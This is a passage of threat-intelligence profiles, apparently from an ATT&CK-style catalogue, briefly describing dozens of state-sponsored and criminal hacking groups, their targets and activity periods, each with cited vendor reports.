Rancor is a threat group that has led targeted campaigns against the South East Asia region. Rancor uses politically-motivated lures to entice victims to open malicious documents. [Rancor Unit42 June 2018](https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/)
Thrip
Thrip is an espionage group that has targeted satellite communications, telecoms, and defense contractor companies in the U.S. and Southeast Asia. The group uses custom malware as well as "living off the land" techniques. [Symantec Thrip June 2018](https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets)
Leafminer
Leafminer is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017. [Symantec Leafminer July 2018](https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east)
Gorgon Group
Gorgon Group is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. [Unit 42 Gorgon Group Aug 2018](https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/)
DarkHydrus
DarkHydrus is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. [Unit 42 DarkHydrus July 2018](https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/) [Unit 42 Playbook Dec 2017](https://pan-unit42.github.io/playbook_viewer/)
Cobalt Group
Cobalt Group is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. Cobalt Group has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims. [Talos Cobalt Group July 2018](https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html) [PTSecurity Cobalt Group Aug 2017](https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf) [PTSecurity Cobalt Dec 2016](https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf) [Group IB Cobalt Aug 2017](https://www.group-ib.com/blog/cobalt) [Proofpoint Cobalt June 2017](https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target) [RiskIQ Cobalt Nov 2017](https://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/) [RiskIQ Cobalt Jan 2018](https://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/) Reporting indicates there may be links between Cobalt Group and both the malware Carbanak and the group Carbanak. [Europol Cobalt Mar 2018](https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain)
Tropic Trooper
Tropic Trooper is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. Tropic Trooper focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011. [TrendMicro Tropic Trooper Mar 2018](https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/) [Unit 42 Tropic Trooper Nov 2016](https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/) [TrendMicro Tropic Trooper May 2020](https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf)
APT38
APT38 is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau. [CISA AA20-239A BeagleBoyz August 2020](https://us-cert.cisa.gov/ncas/alerts/aa20-239a) Active since at least 2014, APT38 has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which APT38 stole $81 million, as well as attacks against Bancomext [FireEye APT38 Oct 2018](https://services.google.com/fh/files/misc/apt38-un-usual-suspects.pdf) and Banco de Chile [FireEye APT38 Oct 2018](https://services.google.com/fh/files/misc/apt38-un-usual-suspects.pdf); some of their attacks have been destructive. [CISA AA20-239A BeagleBoyz August 2020](https://us-cert.cisa.gov/ncas/alerts/aa20-239a) [FireEye APT38 Oct 2018](https://services.google.com/fh/files/misc/apt38-un-usual-suspects.pdf) [DOJ North Korea Indictment Feb 2021](https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and) [Kaspersky Lazarus Under The Hood Blog 2017](https://securelist.com/lazarus-under-the-hood/77908/) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.
SilverTerrier
SilverTerrier is a Nigerian threat group that has been seen active since 2014. SilverTerrier mainly targets organizations in high technology, higher education, and manufacturing. [Unit42 SilverTerrier 2018](https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise) [Unit42 SilverTerrier 2016](https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf)
Gallmaker
Gallmaker is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors. [Symantec Gallmaker Oct 2018](https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group)
FIN4
FIN4 is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013. [FireEye Hacking FIN4 Dec 2014](https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf) [FireEye FIN4 Stealing Insider NOV 2014](https://web.archive.org/web/20190508171649/https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html) FIN4 is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence. [FireEye Hacking FIN4 Dec 2014](https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf) [FireEye Hacking FIN4 Video Dec 2014](https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html)
APT39
APT39 is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. APT39 has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS. [FireEye APT39 Jan 2019](https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html) [Symantec Chafer Dec 2015](https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets) [FBI FLASH APT39 September 2020](https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf) [Dept. of Treasury Iran Sanctions September 2020](https://home.treasury.gov/news/press-releases/sm1127) [DOJ Iran Indictments September 2020](https://www.justice.gov/opa/pr/department-justice-and-partner-departments-and-agencies-conduct-coordinated-actions-disrupt)
TEMP.Veles
TEMP.Veles is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems. [FireEye TRITON 2019](https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html) [FireEye TEMP.Veles 2018](https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html) [FireEye TEMP.Veles JSON April 2019](https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html)
The White Company
The White Company is a likely state-sponsored threat actor with advanced capabilities. From 2017 through 2018, the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan. [Cylance Shaheen Nov 2018](https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066572390.1555511517)
WIRTE
WIRTE is a cyberespionage actor, believed to be a subgroup of the Hamas-affiliated Gaza Cybergang, that has been active since at least August 2018. WIRTE has targeted diplomatic, financial, military, legal, and technology organizations across the Middle East, North Africa, and in Europe to gather intelligence. WIRTE has remained persistently active despite the ongoing Israel-Hamas conflict and has expanded their operations to include wiper malware attacks against Israeli targets. [Lab52 WIRTE Apr 2019](https://lab52.io/blog/wirte-group-attacking-the-middle-east/) [Kaspersky WIRTE November 2021](https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044) [Check Point Wirte NOV 2024](https://research.checkpoint.com/2024/hamas-affiliated-threat-actor-expands-to-disruptive-activity/) [Palo Alto Ashen Lepus DEC 2025](https://unit42.paloaltonetworks.com/hamas-affiliate-ashen-lepus-uses-new-malware-suite-ashtag/)
Silence
Silence is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank's Automated Workstation Client, ATMs, and card processing. [Cyber Forensicator Silence Jan 2019](https://web.archive.org/web/20220119133748/https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/) [SecureList Silence Nov 2017](https://securelist.com/the-silence/83009/)
GALLIUM
GALLIUM is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. This group is particularly known for launching Operation Soft Cell, a long-term campaign targeting telecommunications providers. [Cybereason Soft Cell June 2019](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers) Security researchers have identified GALLIUM as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors. [Cybereason Soft Cell June 2019](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers) [Microsoft GALLIUM December 2019](https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/) [Unit 42 PingPull Jun 2022](https://unit42.paloaltonetworks.com/pingpull-gallium/)
Kimsuky
Kimsuky is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially targeted South Korean government agencies, think tanks, and subject-matter experts in various fields. Its operations expanded to include the United Nations and organizations in the government, education, business services, and manufacturing sectors across the United States, Japan, Russia, and Europe. Kimsuky has focused collection on foreign policy and national security issues tied to the Korean Peninsula, nuclear policy, and sanctions. Its operations have overlapped with other DPRK actors, likely due to ad hoc collaboration or limited resource sharing. [EST Kimsuky April 2019](https://blog.alyac.co.kr/2234) [Cybereason Kimsuky November 2020](https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite) [Malwarebytes Kimsuky June 2021](https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/) [CISA AA20-301A Kimsuky](https://us-cert.cisa.gov/ncas/alerts/aa20-301a) [Mandiant APT43 March 2024](https://services.google.com/fh/files/misc/apt43-report-en.pdf) [Proofpoint TA427 April 2024](https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering) Because of overlapping operations, some researchers group a wide range of North Korean state-sponsored cyber activity under the broader Lazarus Group umbrella rather than tracking separate subgroup or cluster distinctions. Kimsuky was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019). [Netscout Stolen Pencil Dec 2018](https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/) [EST Kimsuky SmokeScreen April 2019](https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf) [AhnLab Kimsuky Kabar Cobra Feb 2019](https://global.ahnlab.com/global/upload/download/techreport/%5BAnalysis_Report%5DOperation%20Kabar%20Cobra.pdf) In 2023, Kimsuky was observed using commercial large language models to assist with vulnerability research, scripting, social engineering and reconnaissance. [MSFT-AI](https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/)
Machete
Machete is a suspected Spanish-speaking cyber espionage group that has been active since at least 2010. It has primarily focused its operations within Latin America, with a particular emphasis on Venezuela, but also in the US, Europe, Russia, and parts of Asia. Machete generally targets high-profile organizations such as government institutions, intelligence services, and military units, as well as telecommunications and power companies. [Cylance Machete Mar 2017](https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html) [Securelist Machete Aug 2014](https://securelist.com/el-machete/66108/) [ESET Machete July 2019](https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf) [360 Machete Sep 2020](https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/)
BlackTech
BlackTech is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia--particularly Taiwan, Japan, and Hong Kong--and the US since at least 2013. BlackTech has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks. [TrendMicro BlackTech June 2017](https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/) [Symantec Palmerworm Sep 2020](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt) [Reuters Taiwan BlackTech August 2020](https://www.reuters.com/article/us-taiwan-cyber-china/taiwan-says-china-behind-cyberattacks-on-government-agencies-emails-idUSKCN25F0JK)
APT-C-36
APT-C-36 is a suspected South America espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing. [QiAnXin APT-C-36 Feb2019](https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/)
Inception
Inception is a cyber espionage group active since at least 2014. The group has targeted multiple industries and governmental entities primarily in Russia, but has also been active in the United States and throughout Europe, Asia, Africa, and the Middle East. [Unit 42 Inception November 2018](https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/) [Symantec Inception Framework March 2018](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies) [Kaspersky Cloud Atlas December 2014](https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/)
Mofang
Mofang is a likely China-based cyber espionage group, named for its frequent practice of imitating a victim's infrastructure. This adversary has been observed since at least May 2012 conducting focused attacks against government and critical infrastructure in Myanmar, as well as several other countries and sectors including military, automobile, and weapons industries. [FOX-IT May 2016 Mofang](https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf)
DarkVishnya
DarkVishnya is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region. [Securelist DarkVishnya Dec 2018](https://securelist.com/darkvishnya/89169/)
Rocke
Rocke is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name Rocke comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed. [Talos Rocke August 2018](https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html)
Whitefly
Whitefly is a cyber espionage group that has been operating since at least 2017. The group has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information. The group has been linked to an attack against Singapore’s largest public health organization, SingHealth. [Symantec Whitefly March 2019](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore)
Blue Mockingbird
Blue Mockingbird is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019. [RedCanary Mockingbird May 2020](https://redcanary.com/blog/blue-mockingbird-cryptominer/)
Windshift
Windshift is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East. [SANS Windshift August 2018](https://www.scribd.com/document/661837258/WINDSHIFT-summit-archive-1554718868) [objective-see windtail1 dec 2018](https://objective-see.com/blog/blog_0x3B.html) [objective-see windtail2 jan 2019](https://objective-see.com/blog/blog_0x3D.html)
Chimera
Chimera is a suspected China-based threat group that has been active since at least 2018 targeting the semiconductor industry in Taiwan as well as data from the airline industry. [Cycraft Chimera April 2020](https://cycraft.com/download/CyCraft-Whitepaper-Chimera_V4.1.pdf) [NCC Group Chimera January 2021](https://web.archive.org/web/20230218064220/https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/)
GOLD SOUTHFIELD
GOLD SOUTHFIELD is a financially motivated threat group active since at least 2018 that operates the REvil Ransomware-as-a Service (RaaS). GOLD SOUTHFIELD provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, GOLD SOUTHFIELD started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked. [Secureworks REvil September 2019](https://www.secureworks.com/research/revil-sodinokibi-ransomware) [Secureworks GandCrab and REvil September 2019](https://www.secureworks.com/blog/revil-the-gandcrab-connection) [Secureworks GOLD SOUTHFIELD](https://www.secureworks.com/research/threat-profiles/gold-southfield) [CrowdStrike Evolution of Pinchy Spider July 2021](https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/)
Fox Kitten
Fox Kitten is threat actor with a suspected nexus to the Iranian government that has been active since at least 2017 against entities in the Middle East, North Africa, Europe, Australia, and North America. Fox Kitten has targeted multiple industrial verticals including oil and gas, technology, government, defense, healthcare, manufacturing, and engineering. [ClearkSky Fox Kitten February 2020](https://www.clearskysec.com/fox-kitten/) [CrowdStrike PIONEER KITTEN August 2020](https://www.crowdstrike.com/blog/who-is-pioneer-kitten/) [Dragos PARISITE](https://www.dragos.com/threat/parisite/) [ClearSky Pay2Kitten December 2020](https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf)
Indrik Spider
Indrik Spider is a Russia-based cybercriminal group that has been active since at least 2014. Indrik Spider initially started with the Dridex banking Trojan, and then by 2017 they began running ransomware operations using BitPaymer, WastedLocker, and Hades ransomware. Following U.S. sanctions and an indictment in 2019, Indrik Spider changed their tactics and diversified their toolset. [Crowdstrike Indrik November 2018](https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/) [Crowdstrike EvilCorp March 2021](https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/) [Treasury EvilCorp Dec 2019](https://home.treasury.gov/news/press-releases/sm845)
Evilnum
Evilnum is a financially motivated threat group that has been active since at least 2018. [ESET EvilNum July 2020](https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/)
Sidewinder
Sidewinder is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan. [ATT Sidewinder January 2021](https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf) [Securelist APT Trends April 2018](https://securelist.com/apt-trends-report-q1-2018/85280/) [Cyble Sidewinder September 2020](https://cybleinc.com/2020/09/26/sidewinder-apt-targets-with-futuristic-tactics-and-techniques/)
Silent Librarian
Silent Librarian is a group that has targeted research and proprietary data at universities, government agencies, and private sector companies worldwide since at least 2013. Members of Silent Librarian are known to have been affiliated with the Iran-based Mabna Institute which has conducted cyber intrusions at the behest of the government of Iran, specifically the Islamic Revolutionary Guard Corps (IRGC). [DOJ Iran Indictments March 2018](https://www.justice.gov/usao-sdny/press-release/file/1045781/download) [Phish Labs Silent Librarian](https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment) [Malwarebytes Silent Librarian October 2020](https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/)
Volatile Cedar
Volatile Cedar is a Lebanese threat group that has targeted individuals, companies, and institutions worldwide. Volatile Cedar has been operating since 2012 and is motivated by political and ideological interests. [CheckPoint Volatile Cedar March 2015](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf) [ClearSky Lebanese Cedar Jan 2021](https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf)
Windigo
The Windigo group has been operating since at least 2011, compromising thousands of Linux and Unix servers using the Ebury SSH backdoor to create a spam botnet. Despite law enforcement intervention against the creators, Windigo operators continued updating Ebury through 2019. [ESET Windigo Mar 2014](https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/) [CERN Windigo June 2019](https://security.web.cern.ch/advisories/windigo/windigo.shtml)
HAFNIUM
HAFNIUM is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. HAFNIUM primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. HAFNIUM has targeted remote management tools and cloud software for intial access and has demonstrated an ability to quickly operationalize exploits for identified vulnerabilities in edge devices. [Microsoft HAFNIUM March 2020](https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/) [Volexity Exchange Marauder March 2021](https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/) [Microsoft Silk Typhoon MAR 2025](https://www.microsoft.com/en-us/security/blog/2025/03/05/silk-typhoon-targeting-it-supply-chain/)
Higaisa
Higaisa is a threat group suspected to have South Korean origins. Higaisa has targeted government, public, and trade organizations in North Korea; however, they have also carried out attacks in China, Japan, Russia, Poland, and other nations. Higaisa was first disclosed in early 2019 but is assessed to have operated as early as 2009. [Malwarebytes Higaisa 2020](https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/) [Zscaler Higaisa 2020](https://www.zscaler.com/blogs/security-research/return-higaisa-apt) [PTSecurity Higaisa 2020](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/)
TA551
TA551 is a financially-motivated threat group that has been active since at least 2018. [Secureworks GOLD CABIN](https://www.secureworks.com/research/threat-profiles/gold-cabin) The group has primarily targeted English, German, Italian, and Japanese speakers through email-based malware distribution campaigns. [Unit 42 TA551 Jan 2021](https://unit42.paloaltonetworks.com/ta551-shathak-icedid/)
ZIRCONIUM
ZIRCONIUM is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community. [Microsoft Targeting Elections September 2020](https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/) [Check Point APT31 February 2021](https://research.checkpoint.com/2021/the-story-of-jian/)
Mustang Panda
Mustang Panda is a China-based cyber espionage threat actor that has been conducting operations since at least 2012. Mustang Panda has been known to use tailored phishing lures and decoy documents to deliver malicious payloads. Mustang Panda has targeted government, diplomatic, and non-governmental organizations, including think tanks, religious institutions, and research entities, across the United States, Europe, and Asia, with notable activity in Russia, Mongolia, Myanmar, Pakistan, and Vietnam. [BlackBerry MUSTANG PANDA October 2022](https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims) [Eset PlugX Korplug Mustang Panda March 2022](https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/) [Anomali MUSTANG PANDA October 2019](https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations) [Cisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022](https://blog.talosintelligence.com/mustang-panda-targets-europe/) [Secureworks BRONZE PRESIDENT December 2019](https://www.secureworks.com/research/bronze-president-targets-ngos) [DOJ Affidavit Search and Seizure PlugX December 2024](https://www.justice.gov/archives/opa/media/1384136/dl) [EclecticIQ Mustang Panda PlugX](https://blog.eclecticiq.com/mustang-panda-apt-group-uses-european-commission-themed-lure-to-deliver-plugx-malware) [ATTACKIQ MUSTANG PANDA TONESHELL March 2023](https://www.attackiq.com/2023/03/23/emulating-the-politically-motivated-chinese-apt-mustang-panda/) [Crowdstrike MUSTANG PANDA June 2018](https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/) [Palo Alto Networks, Unit 42](https://unit42.paloaltonetworks.com/stately-taurus-uses-bookworm-malware/) [Sophos PlugX September 2022](https://www.secureworks.com/blog/bronze-president-targets-russian-speakers-with-updated-plugx) [Sophos Mustang Panda PLUGX](https://www.secureworks.com/blog/bronze-president-targets-government-officials) [Zscaler](https://www.zscaler.com/blogs/security-research/latest-mustang-panda-arsenal-toneshell-and-starproxy-p1)
Ajax Security Team
Ajax Security Team is a group that has been active since at least 2010 and believed to be operating out of Iran. By 2014 Ajax Security Team transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies. [FireEye Operation Saffron Rose 2013](https://www.mandiant.com/sites/default/files/2021-09/rpt-operation-saffron-rose.pdf)
Tonto Team
Tonto Team is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. Tonto Team has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017). [Kaspersky CactusPete Aug 2020](https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/) [ESET Exchange Mar 2021](https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/) [FireEye Chinese Espionage October 2019](https://web.archive.org/web/20210308054208/https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf) [ARS Technica China Hack SK April 2017](https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/) [Trend Micro HeartBeat Campaign January 2013](https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the-heartbeat-apt-campaign.pdf?) [Talos Bisonal 10 Years March 2020](https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html)
Nomadic Octopus
Nomadic Octopus is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. Nomadic Octopus has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants. [Security Affairs DustSquad Oct 2018](https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html) [Securelist Octopus Oct 2018](https://securelist.com/octopus-infested-seas-of-central-asia/88200/) [ESET Nomadic Octopus 2018](https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf)
Transparent Tribe
Transparent Tribe is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan. [Proofpoint Operation Transparent Tribe March 2016](https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf) [Kaspersky Transparent Tribe August 2020](https://securelist.com/transparent-tribe-part-1/98127/) [Talos Transparent Tribe May 2021](https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html)
BackdoorDiplomacy
BackdoorDiplomacy is a cyber espionage threat group that has been active since at least 2017. BackdoorDiplomacy has targeted Ministries of Foreign Affairs and telecommunication companies in Africa, Europe, the Middle East, and Asia. [ESET BackdoorDiplomacy Jun 2021](https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/)
IndigoZebra
IndigoZebra is a suspected Chinese cyber espionage group that has been targeting Central Asian governments since at least 2014. [HackerNews IndigoZebra July 2021](https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html) [Checkpoint IndigoZebra July 2021](https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/) [Securelist APT Trends Q2 2017](https://securelist.com/apt-trends-report-q2-2017/79332/)
Ferocious Kitten
Ferocious Kitten is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015. [Kaspersky Ferocious Kitten Jun 2021](https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/)
Andariel
Andariel is a North Korean state-sponsored threat group that has been active since at least 2009. Andariel has primarily focused its operations--which have included destructive attacks--against South Korean government agencies, military organizations, and a variety of domestic companies; they have also conducted cyber financial operations against ATMs, banks, and cryptocurrency exchanges. Andariel's notable activity includes Operation Black Mine, Operation GoldenAxe, and Campaign Rifle. [FSI Andariel Campaign Rifle July 2017](https://fsiceat.tistory.com/2) [IssueMakersLab Andariel GoldenAxe May 2017](http://www.issuemakerslab.com/research3/) [AhnLab Andariel Subgroup of Lazarus June 2018](https://web.archive.org/web/20230213154832/http://download.ahnlab.com/global/brochure/%5BAnalysis%5DAndariel_Group.pdf) [TrendMicro New Andariel Tactics July 2018](https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html) [CrowdStrike Silent Chollima Adversary September 2021](https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/) Andariel is considered a sub-set of Lazarus Group, and has been attributed to North Korea's Reconnaissance General Bureau. [Treasury North Korean Cyber Groups September 2019](https://home.treasury.gov/news/press-releases/sm774) North Korean group definitions are known 